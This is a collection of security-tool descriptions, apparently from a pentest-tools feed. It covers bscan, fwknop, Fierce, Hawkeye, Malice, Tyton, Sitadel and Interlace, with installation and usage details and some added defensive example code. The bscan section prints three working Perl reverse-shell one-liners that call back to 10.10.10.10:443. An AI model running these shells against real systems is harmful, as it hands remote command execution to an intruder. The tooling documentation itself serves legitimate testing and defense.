Bscan – An Asynchronous Target Enumeration Tool

Synopsis

bscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.

Installation

bscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.

Download the latest packaged version from PyPI:

    pip install bscan

Or get the bleeding-edge version from version control:

    pip install https://github.com/welchbj/bscan/archive/master.tar.gz

Basic Usage

bscan has a wide variety of configuration options which can be used to tune scans to your needs. Here's a quick example:

    $ bscan \
    > --max-concurrency 3 \
    > --patterns [Mm]icrosoft \
    > --status-interval 10 \
    > --verbose-status \
    > scanme.nmap.org

What's going on here?

- --max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time
- --patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output
- --status-interval 10 tells bscan to print runtime status updates every 10 seconds
- --verbose-status means that each of these status updates will print details of all currently-running scan subprocesses
- scanme.nmap.org is the host upon which we want to enumerate

bscan also relies on some additional configuration files. The default files can be found in the bscan/configuration directory and serve the following purposes:

- patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan output
- required-programs.txt specifies the installed programs that bscan plans on using
- port-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan output
- service-scans.toml defines the scans to be run on the target(s) on a per-service basis

Detailed Options

Here's what you should see when running bscan --help:

    usage: bscan [OPTIONS] targets

     _
    | |__  ___  ___ __ _ _ __
    | '_ \/ __|/ __/ _` | '_ \
    | |_) \__ \ (__ (_| | | | |
    |_.__/|___/\___\__,_|_| |_|

    an asynchronous service enumeration tool

    positional arguments:
      targets               the targets and/or networks on which to perform
                            enumeration

    optional arguments:
      -h, --help            show this help message and exit
      --brute-pass-list F   filename of password list to use for brute-forcing
      --brute-user-list F   filename of user list to use for brute-forcing
      --cmd-print-width I   the maximum integer number of characters allowed when
                            printing the command used to spawn a running
                            subprocess (defaults to 80)
      --config-dir D        the base directory from which to load the
                            configuration files; required configuration files
                            missing from this directory will instead be loaded
                            from the default files shipped with this program
      --hard                force overwrite of existing directories
      --max-concurrency I   maximum integer number of subprocesses permitted to be
                            running concurrently (defaults to 20)
      --no-program-check    disable checking the presence of required system
                            programs
      --no-file-check       disable checking the presence of files such as
                            configured wordlists
      --no-service-scans    disable running scans on discovered services
      --output-dir D        the base directory in which to write output files
      --patterns [ [ ...]]  regex patterns to highlight in output text
      --ping-sweep          enable ping sweep filtering of hosts from a network
                            range before running more intensive scans
      --quick-only          whether to only run the quick scan (and not include
                            the thorough scan over all ports)
      --qs-method S         the method for performing the initial TCP port scan;
                            must correspond to a configured port scan
      --status-interval I   integer number of seconds to pause in between
                            printing status updates; a non-positive value
                            disables updates (defaults to 30)
      --ts-method S         the method for performing the thorough TCP port scan;
                            must correspond to a configured port scan
      --udp                 whether to run UDP scans
      --udp-method S        the method for performing the UDP port scan; must
                            correspond to a configured port scan
      --verbose-status      whether to print verbose runtime status updates,
                            based on frequency specified by `--status-interval`
                            flag
      --version             program version
      --web-word-list F     the wordlist to use for scans

Companion Tools

The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.

bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:

    $ bscan-wordlists --find "*win*"
    /usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
    /usr/share/wordlists/metasploit/sensitive_files_win.txt
    /usr/share/seclists/Passwords/common-passwords-win.txt

Try bscan-wordlists --help to explore other options.

bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:

    $ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
    perl for windows
    perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    perl with /bin/sh
    perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    perl without /bin/sh
    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.

Development

Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):

    # setup the environment
    mkvirtualenv -p $(which python3) bscan-dev
    workon bscan-dev

    # get the deps
    pip install -r dev-requirements.txt

Lint and type-check the project (these are run on Travis, too):

    flake8 . && mypy bscan

When it's time to package a new release:

    # build source and wheel distributions
    python setup.py bdist_wheel sdist

    # run post-build checks
    twine check dist/*

    # upload to PyPI
    twine upload dist/*

Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Fwknop – Single Packet Authorization & Port Knocking

fwknop implements an authorization scheme known as Single Packet Authorization (SPA) for strong service concealment. SPA requires only a single packet which is encrypted, non-replayable, and authenticated via an HMAC in order to communicate desired access to a service that is hidden behind a firewall in a default-drop filtering stance. The main application of SPA is to use a firewall to drop all attempts to connect to services such as SSH in order to make the exploitation of vulnerabilities (both 0-day and unpatched code) more difficult. Because there are no open ports, any service that is concealed by SPA naturally cannot be scanned for with Nmap. The fwknop project supports four different firewalls: iptables, firewalld, PF, and ipfw across Linux, OpenBSD, FreeBSD, and Mac OS X. There is also support for custom scripts so that fwknop can be made to support other infrastructure such as ipset or nftables.

SPA is essentially next generation Port Knocking (PK), but solves many of the limitations exhibited by PK while retaining its core benefits. PK limitations include a general difficulty in protecting against replay attacks, asymmetric ciphers and HMAC schemes are not usually possible to reliably support, and it is trivially easy to mount a DoS attack against a PK server just by spoofing an additional packet into a PK sequence as it traverses the network (thereby convincing the PK server that the client doesn't know the proper sequence). All of these shortcomings are solved by SPA. At the same time, SPA hides services behind a default-drop firewall policy, acquires SPA data passively (usually via libpcap or other means), and implements standard cryptographic operations for SPA packet authentication and encryption/decryption.

SPA packets generated by fwknop leverage HMAC for authenticated encryption in the encrypt-then-authenticate model. Although the usage of an HMAC is currently optional (enabled via the --use-hmac command line switch), it is highly recommended for three reasons:

1. Without an HMAC, cryptographically strong authentication is not possible with fwknop unless GnuPG is used, but even then an HMAC should still be applied.
2. An HMAC applied after encryption protects against cryptanalytic CBC-mode padding oracle attacks such as the Vaudenay attack and related trickery (like the more recent "Lucky 13" attack against SSL).
3. The code required by the fwknopd daemon to verify an HMAC is much simpler than the code required to decrypt an SPA packet, so an SPA packet without a proper HMAC isn't even sent through the decryption routines.

The final reason above is why an HMAC should still be used even when SPA packets are encrypted with GnuPG, because SPA data is not sent through libgpgme functions unless the HMAC checks out first. GnuPG and libgpgme are relatively complex bodies of code, and therefore limiting the ability of a potential attacker to interact with this code through an HMAC operation helps to maintain a stronger security stance. Generating an HMAC for SPA communications requires a dedicated key in addition to the normal encryption key, and both can be generated with the --key-gen option.

fwknop encrypts SPA packets either with the Rijndael block cipher or via GnuPG and an associated asymmetric cipher. If the symmetric encryption method is chosen, then as usual the encryption key is shared between the client and server (see the /etc/fwknop/access.conf file for details). The actual encryption key used for Rijndael encryption is generated via the standard PBKDF1 key derivation algorithm, and CBC mode is set. If the GnuPG method is chosen, then the encryption keys are derived from GnuPG key rings.

Use Cases

People who use Single Packet Authorization (SPA) or its security-challenged cousin Port Knocking (PK) usually access SSHD running on the same system where the SPA/PK software is deployed. That is, a firewall running on a host has a default-drop policy against all incoming SSH connections so that SSHD cannot be scanned, but a SPA daemon reconfigures the firewall to temporarily grant access to a passively authenticated SPA client:

[Image: "Basic SPA usage to access SSHD"]

fwknop supports the above, but also goes much further and makes robust usage of NAT (for iptables/firewalld firewalls). After all, important firewalls are usually gateways between networks as opposed to just being deployed on standalone hosts. NAT is commonly used on such firewalls (at least for IPv4 communications) to provide Internet access to internal networks that are on RFC 1918 address space, and also to allow external hosts access to services hosted on internal systems.

Because fwknop integrates with NAT, SPA can be leveraged to access internal services through the firewall by users on the external Internet. Although this has plenty of applications on modern traditional networks, it also allows fwknop to support cloud computing environments such as Amazon's AWS:

[Image: "SPA usage on Amazon AWS cloud environments"]

User Interface

The official cross-platform fwknop client user interface fwknop-gui (download, github) is developed by Jonathan Bennett. Most major client-side SPA modes are supported including NAT requests, HMAC and Rijndael keys (GnuPG is not yet supported), fwknoprc stanza saving, and more. Currently fwknop-gui runs on Linux, Mac OS X, and Windows; here is a screenshot from OS X:

[Image: "fwknop-gui on Mac OS X"]

Similarly, an updated Android client is available as well.

Tutorial

A comprehensive tutorial on fwknop can be found here: http://www.cipherdyne.org/fwknop/docs/fwknop-tutorial.html

Features

The following is a complete list of features supported by the fwknop project:

- Implements Single Packet Authorization around iptables and firewalld firewalls on Linux, ipfw firewalls on *BSD and Mac OS X, and PF on OpenBSD.
- The fwknop client runs on Linux, Mac OS X, *BSD, and Windows under Cygwin. In addition, there is an Android app to generate SPA packets.
- Supports both Rijndael and GnuPG methods for the encryption/decryption of SPA packets.
- Supports HMAC authenticated encryption for both Rijndael and GnuPG. The order of operation is encrypt-then-authenticate to avoid various cryptanalytic problems.
- Replay attacks are detected and thwarted by SHA-256 digest comparison of valid incoming SPA packets. Other digest algorithms are also supported, but SHA-256 is the default.
- SPA packets are passively sniffed from the wire via libpcap. The fwknopd server can also acquire packet data from a file that is written to by a separate Ethernet sniffer (such as with tcpdump -w), from the iptables ULOG pcap writer, or directly via a UDP socket in --udp-server mode.
- For iptables firewalls, ACCEPT rules added by fwknop are added and deleted (after a configurable timeout) from custom iptables chains so that fwknop does not interfere with any existing iptables policy that may already be loaded on the system.
- Supports inbound NAT connections for authenticated SPA communications (iptables firewalls only for now). This means fwknop can be configured to create DNAT rules so that you can reach a service (such as SSH) running on an internal system on an RFC 1918 IP address from the open Internet. SNAT rules are also supported, which essentially turns fwknopd into a SPA-authenticating gateway to access the Internet from an internal network.
- Multiple users are supported by the fwknop server, and each user can be assigned their own symmetric or asymmetric encryption key via the /etc/fwknop/access.conf file.
- Automatic resolution of external IP address via https://www.cipherdyne.org/cgi-bin/myip (this is useful when the fwknop client is run from behind a NAT device). Because the external IP address is encrypted within each SPA packet in this mode, Man-in-the-Middle (MITM) attacks where an inline device intercepts an SPA packet and only forwards it from a different IP in an effort to gain access are thwarted.
- Port randomization is supported for the destination port of SPA packets as well as the port over which the follow-on connection is made via the iptables NAT capabilities. The latter applies to forwarded connections to internal services and to access granted to local sockets on the system running fwknopd.
- Integration with Tor (as described in this DefCon 14 presentation). Note that because Tor uses TCP for transport, sending SPA packets through the Tor network requires that each SPA packet is sent over an established TCP connection, so technically this breaks the "single" aspect of "Single Packet Authorization". However, Tor provides anonymity benefits that can outweigh this consideration in some deployments.
- Implements a versioned protocol for SPA communications, so it is easy to extend the protocol to offer new SPA message types and maintain backwards compatibility with older fwknop clients at the same time.
- Supports the execution of shell commands on behalf of valid SPA packets.
- The fwknop server can be configured to place multiple restrictions on inbound SPA packets beyond those enforced by encryption keys and replay attack detection. Namely, packet age, source IP address, remote user, access to requested ports, and more.
- Bundled with fwknop is a comprehensive test suite that issues a series of tests designed to verify that both the client and server pieces of fwknop work properly. These tests involve sniffing SPA packets over the local loopback interface, building temporary firewall rules that are checked for the appropriate access based on the testing config, and parsing output from both the fwknop client and fwknopd server for expected markers for each test. Test suite output can easily be anonymized for communication to third parties for analysis.
- fwknop was the first program to integrate port knocking with passive OS fingerprinting. However, Single Packet Authorization offers many security benefits beyond port knocking, so the port knocking mode of operation is generally deprecated.

Building fwknop

This distribution uses GNU autoconf for setting up the build. Please see the INSTALL file for the general basics on using autoconf.

There are some "configure" options that are specific to fwknop. They are (extracted from ./configure --help):

    --disable-client                    Do not build the fwknop client component.
                                        The default is to build the client.
    --disable-server                    Do not build the fwknop server component.
                                        The default is to build the server.
    --with-gpgme                        support for gpg encryption using libgpgme
                                        [default=check]
    --with-gpgme-prefix=PFX             prefix where GPGME is installed (optional)
    --with-gpg=/path/to/gpg             Specify path to the gpg executable that
                                        gpgme will use [default=check path]
    --with-firewalld=/path/to/firewalld Specify path to the firewalld executable
                                        [default=check path]
    --with-iptables=/path/to/iptables   Specify path to the iptables executable
                                        [default=check path]
    --with-ipfw=/path/to/ipfw           Specify path to the ipfw executable
                                        [default=check path]
    --with-pf=/path/to/pfctl            Specify path to the pf executable
                                        [default=check path]
    --with-ipf=/path/to/ipf             Specify path to the ipf executable
                                        [default=check path]

Examples:

    ./configure --disable-client --with-firewalld=/bin/firewall-cmd
    ./configure --disable-client --with-iptables=/sbin/iptables --with-firewalld=no

Download Fwknop
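To make the check ordering behind the three reasons given in this fwknop section concrete, here is an added example of a minimal SPA-style receiver written for this page; it is not fwknop's code. It verifies the HMAC tag in constant time before anything else, keeps a SHA-256 digest cache of accepted packets for replay detection, and only then decrypts, parses and enforces packet age. The cipher is a stand-in (an HMAC-SHA256 keystream XORed over the payload), not fwknop's Rijndael-CBC with PBKDF1; the keys, the JSON field names, the 120-second age window and the exact order of the replay check relative to decryption are constructed assumptions for this example.

```python
import hashlib
import hmac
import json
import os
import time

# Constructed keys for this example. fwknop generates its own keys (see --key-gen);
# a real deployment uses separate, high-entropy encryption and HMAC keys.
ENC_KEY = b"constructed-encryption-key"
HMAC_KEY = b"constructed-hmac-key"
NONCE_LEN = 16
TAG_LEN = 32           # HMAC-SHA256 output size
MAX_AGE_SECONDS = 120  # assumed packet-age window, not fwknop's default


def _keystream(key, nonce, length):
    """Stand-in stream cipher: HMAC-SHA256 in counter mode. Not fwknop's Rijndael-CBC."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key, plaintext):
    nonce = os.urandom(NONCE_LEN)
    return nonce + bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))


def decrypt(key, blob):
    nonce, body = blob[:NONCE_LEN], blob[NONCE_LEN:]
    return bytes(a ^ b for a, b in zip(body, _keystream(key, nonce, len(body))))


def build_spa_packet(enc_key, hmac_key, source_ip, port, timestamp=None):
    """Client side: encrypt the access request, then MAC the ciphertext (encrypt-then-authenticate)."""
    ts = int(time.time()) if timestamp is None else timestamp
    payload = json.dumps({"src": source_ip, "port": port, "ts": ts}).encode()
    ciphertext = encrypt(enc_key, payload)
    tag = hmac.new(hmac_key, ciphertext, hashlib.sha256).digest()
    return ciphertext + tag


class SpaReceiver:
    """Server side. Order of checks: HMAC -> replay cache -> decrypt -> age."""

    def __init__(self, enc_key, hmac_key, max_age=MAX_AGE_SECONDS):
        self.enc_key = enc_key
        self.hmac_key = hmac_key
        self.max_age = max_age
        self.seen_digests = set()  # SHA-256 of every packet already accepted
        self.decrypt_calls = 0     # instrumentation: shows unauthenticated data never reaches decrypt()

    def verify(self, packet, now=None):
        now = int(time.time()) if now is None else now
        if len(packet) < NONCE_LEN + TAG_LEN:
            return (False, "too short")
        ciphertext, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
        expected = hmac.new(self.hmac_key, ciphertext, hashlib.sha256).digest()
        # 1. Authenticate first, in constant time. A forged or tampered packet stops here,
        #    so the decryption code is never exposed to attacker-controlled input.
        if not hmac.compare_digest(tag, expected):
            return (False, "bad hmac")
        # 2. Replay detection by digest comparison of the whole packet.
        digest = hashlib.sha256(packet).hexdigest()
        if digest in self.seen_digests:
            return (False, "replay")
        # 3. Only now decrypt and parse.
        self.decrypt_calls += 1
        try:
            fields = json.loads(decrypt(self.enc_key, ciphertext))
        except (ValueError, UnicodeDecodeError):
            return (False, "undecodable")
        if not isinstance(fields, dict) or "ts" not in fields:
            return (False, "malformed")
        # 4. Enforce packet age so a captured packet cannot be held back and used later.
        if abs(now - int(fields["ts"])) > self.max_age:
            return (False, "stale")
        self.seen_digests.add(digest)
        return (True, fields)


if __name__ == "__main__":
    receiver = SpaReceiver(ENC_KEY, HMAC_KEY)
    pkt = build_spa_packet(ENC_KEY, HMAC_KEY, "203.0.113.5", 22)
    print(receiver.verify(pkt))  # accepted on first sight
    print(receiver.verify(pkt))  # the identical packet is rejected as a replay
```

The `decrypt_calls` counter is the point of the exercise: a packet with a wrong key, a flipped ciphertext byte or a truncated tag never increments it, which is the property the third reason above describes for fwknopd and libgpgme.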

Link: http://www.kitploit.com/2019/02/fwknop-single-packet-authorization-port.html

Fierce – Semi-Lightweight Scanner That Helps Locate Non-Contiguous IP Space And Hostnames Against Specified Domains

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains. It's really meant as a precursor to nmap, unicornscan, nessus, nikto, etc., since all of those require that you already know what IP space you are looking for. This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network. Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That's especially useful in targeted malware.

Options:

-connect
    Attempt to make http connections to any non RFC1918 (public) addresses. This will output the return headers but be warned, this could take a long time against a company with many targets, depending on network/machine lag. I wouldn't recommend doing this unless it's a small company or you have a lot of free time on your hands (could take hours-days). Inside the file specified the text "Host:\n" will be replaced by the host specified.
    Usage: perl fierce.pl -dns example.com -connect headers.txt

-delay
    The number of seconds to wait between lookups.

-dns
    The domain you would like scanned.

-dnsfile
    Use DNS servers provided by a file (one per line) for reverse lookups (brute force).

-dnsserver
    Use a particular DNS server for reverse lookups (probably should be the DNS server of the target). Fierce uses your DNS server for the initial SOA query and then uses the target's DNS server for all additional queries by default.

-file
    A file you would like the output to be logged to.

-fulloutput
    When combined with -connect this will output everything the webserver sends back, not just the HTTP headers.

-help
    This screen.

-nopattern
    Don't use a search pattern when looking for nearby hosts. Instead dump everything. This is really noisy but is useful for finding other domains that spammers might be using. It will also give you lots of false positives, especially on large domains.

-range
    Scan an internal IP range (must be combined with -dnsserver). Note that this does not support a pattern and will simply output anything it finds.
    Usage: perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co

-search
    Search list. When fierce attempts to traverse up and down ipspace it may encounter other servers within other domains that may belong to the same company. If you supply a comma delimited list to fierce it will report anything found. This is especially useful if the corporate servers are named differently from the public facing website.
    Usage: perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany
    Note that using search could also greatly expand the number of hosts found, as it will continue to traverse once it locates servers that you specified in your search list. The more the better.

-suppress
    Suppress all TTY output (when combined with -file).

-tcptimeout
    Specify a different timeout (default 10 seconds). You may want to increase this if the DNS server you are querying is slow or has a lot of network lag.

-threads
    Specify how many threads to use while scanning (default is single threaded).

-traverse
    Specify a number of IPs above and below whatever IP you have found to look for nearby IPs. Default is 5 above and below. Traverse will not move into other C blocks.

-version
    Output the version number.

-wide
    Scan the entire class C after finding any matching hostnames in that class C. This generates a lot more traffic but can uncover a lot more information.

-wordlist
    Use a separate wordlist (one word per line).
    Usage: perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt

fierce Usage Example

    root@kali:~# fierce -dns example.com
    DNS Servers for example.com:
            b.iana-servers.net
            a.iana-servers.net

    Trying zone transfer first...
            Testing b.iana-servers.net
                    Request timed out or transfer not allowed.
            Testing a.iana-servers.net
                    Request timed out or transfer not allowed.

    Unsuccessful in zone transfer (it was worth a shot)
    Okay, trying the good old fashioned way... brute force

    Checking for wildcard DNS...
    Nope. Good.
    Now performing 2280 test(s)...

Download Fierce-Domain-Scanner

Link: http://feedproxy.google.com/~r/PentestTools/~3/X8Fc7tY8OFI/fierce-semi-lightweight-scanner-that.html

Scanner-Cli – A Project Security/Vulnerability/Risk Scanning Tool

The Hawkeye scanner-cli is a project security, vulnerability and general risk highlighting tool. It is meant to be integrated into your pre-commit hooks and your pipelines.

Running and configuring the scanner

The Hawkeye scanner-cli assumes that your directory structure is such that it keeps the toolchain's files on top level. Roughly, this is what it boils down to:

- Node.js projects have a package.json on top level
- Ruby projects will have a Gemfile on top level
- Python projects will have a requirements.txt on top level
- PHP projects will have a composer.lock on top level
- Java projects will have a build (gradle) or target (maven) folder, and include .java and .jar files

This is not exhaustive as sometimes tools require further files to exist. To understand how the modules decide whether they can handle a project, please check the How it works section and the modules folder.

Docker (recommended)

The docker image is hands-down the easiest way to run the scanner. Please note that your project root (e.g. $PWD) needs to be mounted to /target.

    docker run --rm -v $PWD:/target hawkeyesec/scanner-cli

The docker build is also the recommended way to run the scanner in your CI pipelines. This is an example of running Hawkeye against one of your projects in GoCD:

Link: http://feedproxy.google.com/~r/PentestTools/~3/JoL8_BBnrhQ/scanner-cli-project-securityvulnerabili.html

Malice – VirusTotal Wanna Be (Now With 100% More Hipster)

Malice's mission is to be a free open source version of VirusTotal that anyone can use at any scale from an independent researcher to a fortune 500 company.

Try It Out

DEMO: demo.malice.io
username: malice
password: ecilam

Requirements

Hardware
- ~16GB disk space
- ~4GB RAM

Software
- Docker

Getting Started (OSX)

Install

    $ brew install maliceio/tap/malice

    Usage: malice [OPTIONS] COMMAND [arg...]

    Open Source Malware Analysis Framework

    Version: 0.3.11
    Author: blacktop

    Options:
      --debug, -D    Enable debug mode [$MALICE_DEBUG]
      --help, -h     show help
      --version, -v  print the version

    Commands:
      scan    Scan a file
      watch   Watch a folder
      lookup  Look up a file hash
      elk     Start an ELK docker container
      plugin  List, Install or Remove Plugins
      help    Shows a list of commands or help for one command

    Run 'malice COMMAND --help' for more information on a command.

Scan some malware

    $ malice scan evil.malware

NOTE: On the first run malice will download all of its default plugins, which can take a while to complete.

Malice will output the results as a markdown table that can be piped or copied into a results.md that will look great on Github (see here).

Start Malice's Web UI

    $ malice elk

You can open the Kibana UI and look at the scan results here: http://localhost (assuming you are using Docker for Mac)

Type in malice as the Index name or pattern and click Create. Now click on the Malice Tab and behold!!!

Getting Started (Docker in Docker)

Install/Update all Plugins

    docker run --rm -v /var/run/docker.sock:/var/run/docker.sock malice/engine plugin update --all

Scan a file

    docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
      -v `pwd`:/malice/samples \
      -e MALICE_VT_API=$MALICE_VT_API \
      malice/engine scan SAMPLE

Documentation
- Documentation
- Plugins
- Examples
- Roadmap
- Contributing

Download Malice

Link: http://feedproxy.google.com/~r/PentestTools/~3/MYaRxSE3IIE/malice-virustotal-wanna-be-now-with-100.html

Tyton – Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+

Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+. For more information, visit Tyton's website.

Detected Attacks
- Hidden Modules
- Syscall Table Hooking
- Network Protocol Hooking
- Netfilter Hooking
- Zeroed Process Inodes
- Process Fops Hooking
- Interrupt Descriptor Table Hooking

Additional Features

Notifications: Users (including myself) do not actively monitor their journald logs, so a userland notification daemon has been included to monitor journald logs and display them to the user using libnotify. Notifications are enabled after install by XDG autorun, so if your DM does not have /etc/xdg/autostart it will fail.

DKMS: Dynamic Kernel Module Support has been added for Arch and Fedora/CentOS (looking to expand in the near future). DKMS allows the (near) seamless upgrading of Kernel modules during kernel upgrades. This is mainly important for distributions that provide rolling releases or upgrade their kernel frequently.

Installing

Dependencies
- Linux Kernel 4.4.0-31 or greater
- Corresponding Linux Kernel Headers
- GCC
- Make
- Libnotify
- Libsystemd
- Package Config
- GTK3

From Source

Ubuntu/Debian/Kali

    sudo apt install linux-headers-$(uname -r) gcc make libnotify-dev pkg-config libgtk-3-dev libsystemd-dev
    git clone https://github.com/nbulischeck/tyton.git
    cd tyton
    make
    sudo insmod tyton.ko

Note: For Ubuntu 14.04, libsystemd-dev is named libsystemd-journal-dev.

Arch

    sudo pacman -S linux-headers gcc make libnotify libsystemd pkgconfig gtk3
    git clone https://github.com/nbulischeck/tyton.git
    cd tyton
    make
    sudo insmod tyton.ko

Note: It's recommended to install Tyton through the AUR so you can benefit from DKMS.

Fedora/CentOS

    dnf install kernel-devel gcc make libnotify libnotify-devel systemd-devel gtk3-devel gtk3
    git clone https://github.com/nbulischeck/tyton.git
    cd tyton
    make
    sudo insmod tyton.ko

Kernel Module Arguments

The kernel module can be passed a specific timeout argument on insertion through the command line. To do this, run the command sudo insmod tyton.ko timeout=X where X is the number of minutes you would like the kernel module to wait before executing its scan again.

AUR

Tyton is available on the AUR here. You can install it using the AUR helper of your choice:

    yaourt -S tyton-dkms-git
    yay -S tyton-dkms-git
    pakku -S tyton-dkms-git

Download Tyton
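Tyton performs its hidden-module check from inside the kernel. As an added userland illustration of the same idea (example code written for this page, not Tyton's), the block below cross-checks two views of the loaded module set: the /proc/modules listing, which a module that unlinks itself from the kernel's module list no longer appears in, against the directories under /sys/module that carry an initstate entry (present for modules that were actually inserted, absent for built-in modules). The /proc/modules excerpt and the module names, including the hidden one, are constructed sample data.

```python
import os

# Constructed /proc/modules excerpt: name, size, refcount, dependents, state, address.
SAMPLE_PROC_MODULES = """\
xt_conntrack 16384 1 - Live 0x0000000000000000
nf_conntrack 172032 1 xt_conntrack, Live 0x0000000000000000
tyton 24576 0 - Live 0x0000000000000000
"""

# Constructed sysfs view: names under /sys/module that have an 'initstate' file.
# 'hidden_rk' is a made-up module that is present here but missing from /proc/modules.
SAMPLE_SYSFS_MODULES = {"xt_conntrack", "nf_conntrack", "tyton", "hidden_rk"}


def parse_proc_modules(text):
    """Return the module names from /proc/modules-format text (first column of each line)."""
    names = set()
    for line in text.splitlines():
        fields = line.split()
        if fields:
            names.add(fields[0])
    return names


def sysfs_loaded_modules(sys_module_dir="/sys/module"):
    """Loadable modules known to sysfs: directories that contain an 'initstate' entry.
    Built-in modules can also have a /sys/module directory (for parameters) but no initstate."""
    loaded = set()
    for name in os.listdir(sys_module_dir):
        if os.path.isfile(os.path.join(sys_module_dir, name, "initstate")):
            loaded.add(name)
    return loaded


def find_hidden_modules(proc_names, sysfs_names):
    """Modules present in sysfs but absent from /proc/modules, sorted for stable reporting."""
    return sorted(sysfs_names - proc_names)


def scan_live_system():
    """Run the cross-check against the running kernel (Linux only; needs /proc and /sys)."""
    with open("/proc/modules") as fh:
        proc_names = parse_proc_modules(fh.read())
    return find_hidden_modules(proc_names, sysfs_loaded_modules())


if __name__ == "__main__":
    # Offline demonstration on the constructed data; use scan_live_system() on a real host.
    offline = find_hidden_modules(parse_proc_modules(SAMPLE_PROC_MODULES), SAMPLE_SYSFS_MODULES)
    print("hidden in sample data:", offline)
```

The caveat a practitioner should keep in mind: this userland check only works while the two views disagree. A module that also removes its sysfs entry, or that hooks the syscalls this script relies on, will look clean from userland, which is the reason Tyton does this work as a kernel module rather than as a script.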

Link: http://feedproxy.google.com/~r/PentestTools/~3/-SpNjyLloZM/tyton-linux-kernel-mode-rootkit-hunter.html

Sitadel – Web Application Security Scanner

Sitadel is basically an update for WAScan making it compatible with python >= 3.4. It allows more flexibility for you to write new modules and implement new features:

- Frontend framework detection
- Content Delivery Network detection
- Define Risk Level to allow for scans
- Plugin system
- Docker image available to build and run

Installation

    $ git clone https://github.com/shenril/Sitadel.git
    $ cd Sitadel
    $ pip install .
    $ python sitadel.py --help

Features

Fingerprints
- Server
- Web Frameworks (CakePHP, CherryPy, ...)
- Frontend Frameworks (AngularJS, MeteorJS, VueJS, ...)
- Web Application Firewall (WAF)
- Content Management System (CMS)
- Operating System (Linux, Unix, ...)
- Language (PHP, Ruby, ...)
- Cookie Security
- Content Delivery Networks (CDN)

Attacks:
- Bruteforce
  - Admin Interface
  - Common Backdoors
  - Common Backup Directory
  - Common Backup File
  - Common Directory
  - Common File
  - Log File
- Injection
  - HTML Injection
  - SQL Injection
  - LDAP Injection
  - XPath Injection
  - Cross Site Scripting (XSS)
  - Remote File Inclusion (RFI)
  - PHP Code Injection
- Other
  - HTTP Allow Methods
  - HTML Object
  - Multiple Index
  - Robots Paths
  - Web Dav
  - Cross Site Tracing (XST)
  - PHPINFO
  - .Listing

Vulnerabilities
- ShellShock
- Anonymous Cipher (CVE-2007-1858)
- Crime (SPDY) (CVE-2012-4929)
- Struts-Shock

Example

Simple run

    python sitadel http://website.com

Run with risk level at DANGEROUS and do not follow redirections

    python sitadel http://website.com -r 2 --no-redirect

Run specific modules only and full verbosity

    python sitadel http://website.com -a admin backdoor -f header server -vvv

Run with docker

    docker build -t sitadel .
    docker run sitadel http://example.com

Download Sitadel

Link: http://feedproxy.google.com/~r/PentestTools/~3/zfPWuXefLsw/sitadel-web-application-security-scanner.html

Interlace – Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support

Interlace – Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Applications

Interlace easily turns single-threaded command line applications into fast, multi-threaded applications, with CIDR and glob support.

Setup

Install using:

$ python3 setup.py install

Dependencies will then be installed and Interlace will be added to your path as interlace.

Usage

-t          Specify a target or domain name, either in comma format, CIDR notation, or as an individual host.
-tL         Specify a list of targets or domain names.
-threads    Specify the maximum number of threads to run at any one time (DEFAULT: 5).
-timeout    Specify a timeout value in seconds for any one thread (DEFAULT: 600).
-c          Specify a single command to execute over each target or domain.
-cL         Specify a list of commands to execute over each target or domain.
-o          Specify an output folder variable that can be used in commands as _output_.
-p          Specify a port variable that can be used in commands as _port_. This can be a single port, a comma-delimited list, or dash notation.
-rp         Specify a real port variable that can be used in commands as _realport_.
--no-cidr   If set, CIDR notation in a target file will not be automatically expanded into individual hosts.
--no-color  If set, any foreground or background colours will be stripped out.
--silent    If set, only important information will be displayed; banners and other information will be redacted.
-v          If set, verbose output will be displayed in the terminal.

Further information regarding ports (-p)

80       Single port
1-80     Dash notation: perform a command for each port from 1 to 80
